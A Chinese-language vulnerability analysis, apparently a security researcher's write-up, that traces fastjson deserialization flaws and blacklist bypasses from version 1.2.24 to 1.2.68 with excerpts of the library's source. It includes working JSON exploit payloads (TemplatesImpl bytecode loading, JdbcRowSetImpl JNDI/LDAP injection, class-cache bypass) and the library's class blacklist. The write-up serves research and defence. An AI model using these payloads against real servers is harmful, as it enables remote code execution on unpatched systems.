3. 漏洞分析

1. fastjson-1.2.24

在2017年3月15日,fastjson官方主动爆出在 1.2.24 及之前版本存在远程代码执行高危安全漏洞。
影响版本:fastjson <= 1.2.24
描述:fastjson 默认使用 @type 指定反序列化任意类,攻击者可以通过在 Java 常见环境中寻找能够构造恶意类的方法,通过反序列化的过程中调用的 getter/setter 方法,以及目标成员变量的注入来达到传参的目的,最终形成恶意调用链。此漏洞开启了 fastjson 反序列化漏洞的大门,为安全研究人员提供了新的思路。
TemplatesImpl 反序列化
TemplatesImpl 类位于com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl,实现了 Serializable 接口,因此它可以被序列化,我们来看一下漏洞触发点。
首先我们注意到该类中存在一个成员属性 _class,是一个 Class 类型的数组,数组里下标为_transletIndex 的类会在 getTransletInstance() 方法中使用 newInstance() 实例化。
image.png
而类中的 getOutputProperties() 方法调用 newTransformer() 方法,而 newTransformer() 又调用了 getTransletInstance() 方法。
image.png
image.png
而 getOutputProperties() 方法就是类成员变量 _outputProperties 的 getter 方法。
image.png
这就给了我们调用链,那 _class 中的类是否可控呢?看一下调用,发现在 readObject、构造方法以及 defineTransletClasses() 中有赋值的动作。
image.png
其中 defineTransletClasses() 在 getTransletInstance() 中,如果 _class 不为空即会被调用,看一下 defineTransletClasses() 的逻辑:
image.png
首先要求 _bytecodes 不为空,接着就会调用自定义的 ClassLoader 去加载 _bytecodes 中的 byte[] 。而 _bytecodes 也是该类的成员属性。
而如果这个类的父类为 ABSTRACT_TRANSLET 也就是com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet,就会将类成员属性的,_transletIndex 设置为当前循环中的标记位,而如果是第一次调用,就是_class[0]。如果父类不是这个类,将会抛出异常。
那这样一条完整的漏洞调用链就呈现出来了:

  • 构造一个 TemplatesImpl 类的反序列化字符串,其中 _bytecodes 是我们构造的恶意类的类字节码,这个类的父类是 AbstractTranslet,最终这个类会被加载并使用 newInstance() 实例化。
  • 在反序列化过程中,由于getter方法 getOutputProperties(),满足条件,将会被 fastjson 调用,而这个方法触发了整个漏洞利用流程:getOutputProperties() -> newTransformer() -> getTransletInstance() -> defineTransletClasses() / EvilClass.newInstance().

其中,为了满足漏洞点触发之前不报异常及退出,我们还需要满足 _name 不为 null ,_tfactory 不为 null 。
由于部分需要我们更改的私有变量没有 setter 方法,需要使用 Feature.SupportNonPublicField 参数。
因此最终的 payload 为:

  1. {
  2.     "@type": "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
  3.     "_bytecodes": ["yv66vgAAADQA...CJAAk="],
  4.     "_name": "su18",
  5.     "_tfactory": {},
  6.     "_outputProperties": {},
  7. }

JdbcRowSetImpl 反序列化
JdbcRowSetImpl 类位于 com.sun.rowset.JdbcRowSetImpl ,这条漏洞利用链比较好理解,是 javax.naming.InitialContext#lookup() 参数可控导致的 JNDI 注入。
先看一下 setAutoCommit() 方法,在 this.conn 为空时,将会调用 this.connect() 方法。
image.png
方法里调用了 javax.naming.InitialContext#lookup() 方法,参数从成员变量 dataSource 中获取。
image.png
这时调用链就十分清晰了,最终的 payload 为:

  1. {
  2.     "@type":"com.sun.rowset.JdbcRowSetImpl",
  3.     "dataSourceName":"ldap://127.0.0.1:23457/Command8",
  4.     "autoCommit":true
  5. }

2. fastjson-1.2.25

在版本 1.2.25 中,官方对之前的反序列化漏洞进行了修复,引入了 checkAutoType 安全机制,默认情况下 autoTypeSupport 关闭,不能直接反序列化任意类,而打开 AutoType 之后,是基于内置黑名单来实现安全的,fastjson 也提供了添加黑名单的接口。
影响版本:1.2.25 <= fastjson <= 1.2.41
描述:作者通过为危险功能添加开关,并提供黑白名单两种方式进行安全防护,其实已经是相当完整的防护思路,而且作者已经意识到黑名单类将会无穷无尽,仅仅通过维护列表来防止反序列化漏洞并非最好的办法。而且靠用户自己来关注安全信息去维护也不现实。
安全更新主要集中在 com.alibaba.fastjson.parser.ParserConfig,首先查看类上出现了几个成员变量:布尔型的 autoTypeSupport,用来标识是否开启任意类型的反序列化,并且默认关闭;字符串数组 denyList ,是反序列化类的黑名单;acceptList 是反序列化白名单。
image.png
其中黑名单 denyList 包括:

  1. bsh
  2. com.mchange
  3. com.sun.
  4. java.lang.Thread
  5. java.net.Socket
  6. java.rmi
  7. javax.xml
  8. org.apache.bcel
  9. org.apache.commons.beanutils
  10. org.apache.commons.collections.Transformer
  11. org.apache.commons.collections.functors
  12. org.apache.commons.collections4.comparators
  13. org.apache.commons.fileupload
  14. org.apache.myfaces.context.servlet
  15. org.apache.tomcat
  16. org.apache.wicket.util
  17. org.codehaus.groovy.runtime
  18. org.hibernate
  19. org.jboss
  20. org.mozilla.javascript
  21. org.python.core
  22. org.springframework

添加反序列化白名单有3种方法:

  1. 使用代码进行添加:ParserConfig.getGlobalInstance().addAccept(“org.su18.fastjson.,org.javaweb.”)
  2. 加上JVM启动参数:-Dfastjson.parser.autoTypeAccept=org.su18.fastjson.
  3. 在fastjson.properties中添加:fastjson.parser.autoTypeAccept=org.su18.fastjson.

看一下 checkAutoType() 的逻辑,如果开启了 autoType,先判断类名是否在白名单中,如果在,就使用 TypeUtils.loadClass 加载,然后使用黑名单判断类名的开头,如果匹配就抛出异常。
image.png
如果没开启 autoType ,则是先使用黑名单匹配,再使用白名单匹配和加载。最后,如果要反序列化的类和黑白名单都未匹配时,只有开启了 autoType 或者 expectClass 不为空也就是指定了 Class 对象时才会调用 TypeUtils.loadClass 加载。
image.png
接着跟一下 loadClass ,这个类在加载目标类之前为了兼容带有描述符的类名,使用了递归调用来处理描述符中的 [、L、; 字符。
image.png
因此就在这个位置出现了逻辑漏洞,攻击者可以使用带有描述符的类绕过黑名单的限制,而在类加载过程中,描述符还会被处理掉。因此,漏洞利用的思路就出来了:需要开启 autoType,使用以上字符来进行黑名单的绕过。
最终的 payload 其实就是在之前的 payload 类名上前后加上L和;即可:

  1. {
  2.     "@type":"Lcom.sun.rowset.JdbcRowSetImpl;",
  3.     "dataSourceName":"ldap://127.0.0.1:23457/Command8",
  4.     "autoCommit":true
  5. }

3. fastjson-1.2.42

在版本 1.2.42 中,fastjson 继续延续了黑白名单的检测模式,但是将黑名单类从白名单修改为使用 HASH 的方式进行对比,这是为了防止安全研究人员根据黑名单中的类进行反向研究,用来对未更新的历史版本进行攻击。同时,作者对之前版本一直存在的使用类描述符绕过黑名单校验的问题尝试进行了修复。
影响版本:1.2.25 <= fastjson <= 1.2.42
描述:一点也不坦诚,学学人家 jackson,到现在还是明文黑名单。而且到目前为止很多类已经被撞出来了。
还是关注 com.alibaba.fastjson.parser.ParserConfig 这个类,作者将原本的明文黑名单转为使用了 Hash 黑名单,防止安全人员对其研究。
image.png
并且在 checkAutoType 中加入判断,如果类的第一个字符是 L 结尾是 ;,则使用 substring进行了去除。写判断也不好好写,非要写 hash 。
image.png
但是这种判断完全是徒劳的,因为在最后处理时是递归处理,因此只要对描述符进行双写即可绕过:

  1. {
  2.     "@type":"LLcom.sun.rowset.JdbcRowSetImpl;;",
  3.     "dataSourceName":"ldap://127.0.0.1:23457/Command8",
  4.     "autoCommit":true
  5. }

4. fastjson-1.2.43

这个版本主要是修复上一个版本中双写绕过的问题。
影响版本:1.2.25 <= fastjson <= 1.2.43
描述:上有政策,下有对策。在 L、; 被进行了限制后,安全研究人员将目光转向了 [。
可以看到用来检查的 checkAutoType 代码添加了判断,如果类名连续出现了两个 L 将会抛出异常,
image.png
这样使用 L、; 绕过黑名单的思路就被阻挡了,但是在 loadClass 的过程中,还针对 [ 也进行了处理和递归,能不能利用 [ 进行黑名单的绕过呢?
答案当然是可以的:

  1. {
  2.     "@type":"[com.sun.rowset.JdbcRowSetImpl"[,
  3.     {"dataSourceName":"ldap://127.0.0.1:23457/Command8",
  4.     "autoCommit":true
  5. }

5. fastjson-1.2.44

这个版本主要是修复上一个版本中使用 [ 绕过黑名单防护的问题。
影响版本:1.2.25 <= fastjson <= 1.2.44
描述:在此版本将 [ 也进行修复了之后,由字符串处理导致的黑名单绕过也就告一段落了。
可以看到在 checkAutoType 中添加了新的判断,如果类名以 [ 开始则直接抛出异常。
image.png

6. fastjson-1.2.45

在此版本爆出了一个黑名单绕过,实际上,黑名单是无穷无尽的,随着 fastjson 的版本更新,一定会有更多的黑名单爆出来,因为隔壁 jackson 都是明文黑名单的,只要隔壁一更新,大家都看到了,就会拿来看 fastjson。
影响版本:1.2.25 <= fastjson <= 1.2.45
描述:黑名单列表需要不断补充。

  1. {
  2.     "@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory",
  3.     "properties":{
  4.         "data_source":"ldap://127.0.0.1:23457/Command8"
  5.     }
  6. }

7. fastjson-1.2.47

在 fastjson 不断迭代到 1.2.47 时,爆出了最为严重的漏洞,可以在不开启 AutoTypeSupport 的情况下进行反序列化的利用。
影响版本:1.2.25 <= fastjson <= 1.2.32 未开启 AutoTypeSupport
影响版本:1.2.33 <= fastjson <= 1.2.47
描述:作者删除了一个 fastjson 的测试文件:https://github.com/alibaba/fastjson/commit/be41b36a8d748067ba4debf12bf236388e500c66 ,里面包含了这次通杀漏洞的 payload。
这次的绕过问题还是出现在 checkAutoType() 方法中:

  1.  public Class<?> checkAutoType(String typeName, Class<?> expectClass, int features) {
  2.         // 类名非空判断
  3.         if (typeName == null) {
  4.             return null;
  5.         }
  6.         // 类名长度判断,不大于128不小于3
  7.         if (typeName.length() >= 128 || typeName.length() < 3) {
  8.             throw new JSONException("autoType is not support. " + typeName);
  9.         }
  11.         String className = typeName.replace('$', '.');
  12.         Class<?> clazz = null;
  14.         final long BASIC = 0xcbf29ce484222325L; //;
  15.         final long PRIME = 0x100000001b3L;  //L
  17.         final long h1 = (BASIC ^ className.charAt(0)) * PRIME;
  18.         // 类名以 [ 开头抛出异常
  19.         if (h1 == 0xaf64164c86024f1aL) { // [
  20.             throw new JSONException("autoType is not support. " + typeName);
  21.         }
  22.         // 类名以 L 开头以 ; 结尾抛出异常
  23.         if ((h1 ^ className.charAt(className.length() - 1)) * PRIME == 0x9198507b5af98f0L) {
  24.             throw new JSONException("autoType is not support. " + typeName);
  25.         }
  27.         final long h3 = (((((BASIC ^ className.charAt(0))
  28.                 * PRIME)
  29.                 ^ className.charAt(1))
  30.                 * PRIME)
  31.                 ^ className.charAt(2))
  32.                 * PRIME;
  33.         // autoTypeSupport 为 true 时,先对比 acceptHashCodes 加载白名单项
  34.         if (autoTypeSupport || expectClass != null) {
  35.             long hash = h3;
  36.             for (int i = 3; i < className.length(); ++i) {
  37.                 hash ^= className.charAt(i);
  38.                 hash *= PRIME;
  39.                 if (Arrays.binarySearch(acceptHashCodes, hash) >= 0) {
  40.                     clazz = TypeUtils.loadClass(typeName, defaultClassLoader, false);
  41.                     if (clazz != null) {
  42.                         return clazz;
  43.                     }
  44.                 }
  45.                 // 在对比 denyHashCodes 进行黑名单匹配
  46.                 // 如果黑名单有匹配并且 TypeUtils.mappings 里没有缓存这个类
  47.                 // 则抛出异常
  48.                 if (Arrays.binarySearch(denyHashCodes, hash) >= 0 && TypeUtils.getClassFromMapping(typeName) == null) {
  49.                     throw new JSONException("autoType is not support. " + typeName);
  50.                 }
  51.             }
  52.         }
  54.         // 尝试在 TypeUtils.mappings 中查找缓存的 class
  55.         if (clazz == null) {
  56.             clazz = TypeUtils.getClassFromMapping(typeName);
  57.         }
  59.         // 尝试在 deserializers 中查找这个类
  60.         if (clazz == null) {
  61.             clazz = deserializers.findClass(typeName);
  62.         }
  64.         // 如果找到了对应的 class,则会进行 return
  65.         if (clazz != null) {
  66.             if (expectClass != null
  67.                     && clazz != java.util.HashMap.class
  68.                     && !expectClass.isAssignableFrom(clazz)) {
  69.                 throw new JSONException("type not match. " + typeName + " -> " + expectClass.getName());
  70.             }
  72.             return clazz;
  73.         }
  75.         // 如果没有开启 AutoTypeSupport ,则先匹配黑名单,在匹配白名单,与之前逻辑一致
  76.         if (!autoTypeSupport) {
  77.             long hash = h3;
  78.             for (int i = 3; i < className.length(); ++i) {
  79.                 char c = className.charAt(i);
  80.                 hash ^= c;
  81.                 hash *= PRIME;
  83.                 if (Arrays.binarySearch(denyHashCodes, hash) >= 0) {
  84.                     throw new JSONException("autoType is not support. " + typeName);
  85.                 }
  87.                 if (Arrays.binarySearch(acceptHashCodes, hash) >= 0) {
  88.                     if (clazz == null) {
  89.                         clazz = TypeUtils.loadClass(typeName, defaultClassLoader, false);
  90.                     }
  92.                     if (expectClass != null && expectClass.isAssignableFrom(clazz)) {
  93.                         throw new JSONException("type not match. " + typeName + " -> " + expectClass.getName());
  94.                     }
  96.                     return clazz;
  97.                 }
  98.             }
  99.         }
  100.         // 如果 class 还为空,则使用 TypeUtils.loadClass 尝试加载这个类
  101.         if (clazz == null) {
  102.             clazz = TypeUtils.loadClass(typeName, defaultClassLoader, false);
  103.         }
  105.         if (clazz != null) {
  106.             if (TypeUtils.getAnnotation(clazz,JSONType.class) != null) {
  107.                 return clazz;
  108.             }
  110.             if (ClassLoader.class.isAssignableFrom(clazz) // classloader is danger
  111.                     || DataSource.class.isAssignableFrom(clazz) // dataSource can load jdbc driver
  112.                     ) {
  113.                 throw new JSONException("autoType is not support. " + typeName);
  114.             }
  116.             if (expectClass != null) {
  117.                 if (expectClass.isAssignableFrom(clazz)) {
  118.                     return clazz;
  119.                 } else {
  120.                     throw new JSONException("type not match. " + typeName + " -> " + expectClass.getName());
  121.                 }
  122.             }
  124.             JavaBeanInfo beanInfo = JavaBeanInfo.build(clazz, clazz, propertyNamingStrategy);
  125.             if (beanInfo.creatorConstructor != null && autoTypeSupport) {
  126.                 throw new JSONException("autoType is not support. " + typeName);
  127.             }
  128.         }
  130.         final int mask = Feature.SupportAutoType.mask;
  131.         boolean autoTypeSupport = this.autoTypeSupport
  132.                 || (features & mask) != 0
  133.                 || (JSON.DEFAULT_PARSER_FEATURE & mask) != 0;
  135.         if (!autoTypeSupport) {
  136.             throw new JSONException("autoType is not support. " + typeName);
  137.         }
  139.         return clazz;
  140.     }

由以上代码可知,这里存在一个逻辑问题:autoTypeSupport 为 true 时,fastjson 也会禁止一些黑名单的类反序列化,但是有一个判断条件:当反序列化的类在黑名单中,且 TypeUtils.mappings 中没有该类的缓存时,才会抛出异常。这里就留下了一个伏笔。就是这个逻辑导致了 1.2.32 之前的版本将会受到 autoTypeSupport 的影响。
在 autoTypeSupport 为默认的 false 时,程序直接检查黑名单并抛出异常,在这部分我们无法绕过,所以我们的关注点就在判断之前,程序有在 TypeUtils.mappings 中和 deserializers 中尝试查找要反序列化的类,如果找到了,则就会 return,这就避开下面 autoTypeSupport 默认为 false 时的检查。如何才能在这两步中将我们的恶意类加载进去呢?
先看 deserializers ,位于 com.alibaba.fastjson.parser.ParserConfig.deserializers ,是一个 IdentityHashMap,能向其中赋值的函数有:

  • getDeserializer():这个类用来加载一些特定类,以及有 JSONType 注解的类,在 put 之前都有类名及相关信息的判断,无法为我们所用。
  • initDeserializers():无入参,在构造方法中调用,写死一些认为没有危害的固定常用类,无法为我们所用。
  • putDeserializer():被前两个函数调用,我们无法控制入参。

因此我们无法向 deserializers 中写入值,也就在其中读出我们想要的恶意类。所以我们的目光转向了 TypeUtils.getClassFromMapping(typeName)。
同样的,这个方法从 TypeUtils.mappings 中取值,这是一个 ConcurrentHashMap 对象,能向其中赋值的函数有:

  • addBaseClassMappings():无入参,加载
  • loadClass():关键函数

接下来看一下 loadClass() 的代码:

  1. public static Class<?> loadClass(String className, ClassLoader classLoader, boolean cache) {
  2.         // 非空判断
  3.         if(className == null || className.length() == 0){
  4.             return null;
  5.         }
  6.         // 防止重复添加
  7.         Class<?> clazz = mappings.get(className);
  8.         if(clazz != null){
  9.             return clazz;
  10.         }
  11.         // 判断 className 是否以 [ 开头
  12.         if(className.charAt(0) == '['){
  13.             Class<?> componentType = loadClass(className.substring(1), classLoader);
  14.             return Array.newInstance(componentType, 0).getClass();
  15.         }
  16.         // 判断 className 是否 L 开头 ; 结尾
  17.         if(className.startsWith("L") && className.endsWith(";")){
  18.             String newClassName = className.substring(1, className.length() - 1);
  19.             return loadClass(newClassName, classLoader);
  20.         }
  21.         try{
  22.             // 如果 classLoader 非空,cache 为 true 则使用该类加载器加载并存入 mappings 中
  23.             if(classLoader != null){
  24.                 clazz = classLoader.loadClass(className);
  25.                 if (cache) {
  26.                     mappings.put(className, clazz);
  27.                 }
  28.                 return clazz;
  29.             }
  30.         } catch(Throwable e){
  31.             e.printStackTrace();
  32.             // skip
  33.         }
  34.         // 如果失败,或没有指定 ClassLoader ,则使用当前线程的 contextClassLoader 来加载类,也需要 cache 为 true 才能写入 mappings 中
  35.         try{
  36.             ClassLoader contextClassLoader = Thread.currentThread().getContextClassLoader();
  37.             if(contextClassLoader != null && contextClassLoader != classLoader){
  38.                 clazz = contextClassLoader.loadClass(className);
  39.                 if (cache) {
  40.                     mappings.put(className, clazz);
  41.                 }
  42.                 return clazz;
  43.             }
  44.         } catch(Throwable e){
  45.             // skip
  46.         }
  47.         // 如果还是失败,则使用 Class.forName 来获取 class 对象并放入 mappings 中
  48.         try{
  49.             clazz = Class.forName(className);
  50.             mappings.put(className, clazz);
  51.             return clazz;
  52.         } catch(Throwable e){
  53.             // skip
  54.         }
  55.         return clazz;
  56.     }

由以上代码可知,只要我们能够控制这个方法的参数,就可以往 mappings 中写入任意类名。
loadClass 一共有三个重载方法,如下图:
image.png
我们需要找到调用这些方法的类,并看是否能够为我们控制:

  • Class<?> loadClass(String className, ClassLoader classLoader, boolean cache):调用链均在 checkAutoType() 和 TypeUtils 里自调用,略过。
  • Class<?> loadClass(String className):除了自调用,有一个 castToJavaBean() 方法,暂未研究。
  • Class<?> loadClass(String className, ClassLoader classLoader):方法调用三个参数的重载方法,并添加参数 true ,也就是会加入参数缓存中,

重点看一下两个参数的 loadClass 方法在哪调用:
image.png
在这里我们关注 com.alibaba.fastjson.serializer.MiscCodec#deserialze 方法,这个类是用来处理一些乱七八糟类的反序列化类,其中就包括 Class.class 类,成为了我们的入口。
image.png
如果 parser.resolveStatus 为TypeNameRedirect 时,进入 if 语句,会解析 “val” 中的内容放入 objVal 中,然后传入 strVal 中。
image.png
后面的逻辑如果 class 是 Class.class 时,将会调用 loadClass 方法,将 strVal 进行类加载并缓存:
image.png
这就完成了恶意类的加载,组成了我们所有的恶意调用链。但是如何在第二步进入 if 语句呢?这中间的调用链是什么样的呢?我们先构造一个 json :{“@type”:”java.lang.Class”,”val”:”aaaaa”} ,调试一下:
JSON.parseObject() 调用 DefaultJSONParser 对 JSON 进行解析。
image.png
DefaultJSONParser.parseObject() 调用 checkAutoType() 检查待加载类的合法性。
image.png
由于 deserializers 在初始化时将 Class.class 进行了加载,因此使用 findClass 可以找到,越过了后面 AutoTypeSupport 的检查。
image.png
DefaultJSONParser.parseObject() 设置 resolveStatus 为 TypeNameRedirect。
image.png
DefaultJSONParser.parseObject() 根据不同的 class 类型分配 deserialzer,Class 类型由 MiscCodec.deserialze() 处理。
image.png
解析 json 中 “val” 中的内容,并放入 objVal 中,如果不是 “val” 将会报错。
image.png
传递至 strVal 并使用 loadClass 加载并缓存。
image.png
此时恶意的 val 成功被我们加载到 mappings 中,再次以恶意类进行 @type 请求时即可绕过黑名单进行的阻拦,因此最终 payload 为:

  1. {
  2.     "su18": {
  3.         "@type": "java.lang.Class",
  4.         "val": "com.sun.rowset.JdbcRowSetImpl"
  5.     },
  6.     "su19": {
  7.         "@type": "com.sun.rowset.JdbcRowSetImpl",
  8.         "dataSourceName": "ldap://127.0.0.1:23457/Command8",
  9.         "autoCommit": true
  10.     }
  11. }

8. fastjson-1.2.68

在 1.2.47 版本漏洞爆发之后,官方在 1.2.48 对漏洞进行了修复,在 MiscCodec 处理 Class 类的地方,设置了cache 为 false ,并且 loadClass 重载方法的默认的调用改为不缓存,这就避免了使用了 Class 提前将恶意类名缓存进去。
这个安全修复为 fastjson 带来了一定时间的平静,直到 1.2.68 版本出现了新的漏洞利用方式。
影响版本:fastjson <= 1.2.68
描述:利用 expectClass 绕过 checkAutoType() ,实际上也是为了绕过安全检查的思路的延伸。主要使用 Throwable 和 AutoCloseable 进行绕过。
版本 1.2.68 本身更新了一个新的安全控制点 safeMode,如果应用程序开启了 safeMode,将在 checkAutoType() 中直接抛出异常,也就是完全禁止 autoType,不得不说,这是一个一劳永逸的修复方式。
image.png
但与此同时,这个版本报出了一个新的 autoType 开关绕过方式:利用 expectClass 绕过 checkAutoType()。
在 checkAutoType() 函数中有这样的逻辑:如果函数有 expectClass 入参,且我们传入的类名是 expectClass 的子类或实现,并且不在黑名单中,就可以通过 checkAutoType() 的安全检测。
image.png
接下来我们找一下 checkAutoType() 几个重载方法是否有可控的 expectClass 的入参方式,最终找到了以下几个类:

  • ThrowableDeserializer#deserialze()
  • JavaBeanDeserializer#deserialze()

ThrowableDeserializer#deserialze() 方法直接将 @type 后的类传入 checkAutoType() ,并且 expectClass 为 Throwable.class。
image.png
通过 checkAutoType() 之后,将使用 createException 来创建异常类的实例。
image.png
这就形成了 Throwable 子类绕过 checkAutoType() 的方式。我们需要找到 Throwable 的子类,这个类的 getter/setter/static block/constructor 中含有具有威胁的代码逻辑。
与 Throwable 类似地,还有 AutoCloseable ,之所以使用 AutoCloseable 以及其子类可以绕过 checkAutoType() ,是因为 AutoCloseable 是属于 fastjson 内置的白名单中,其余的调用链一致,流程不再赘述。
su18
Back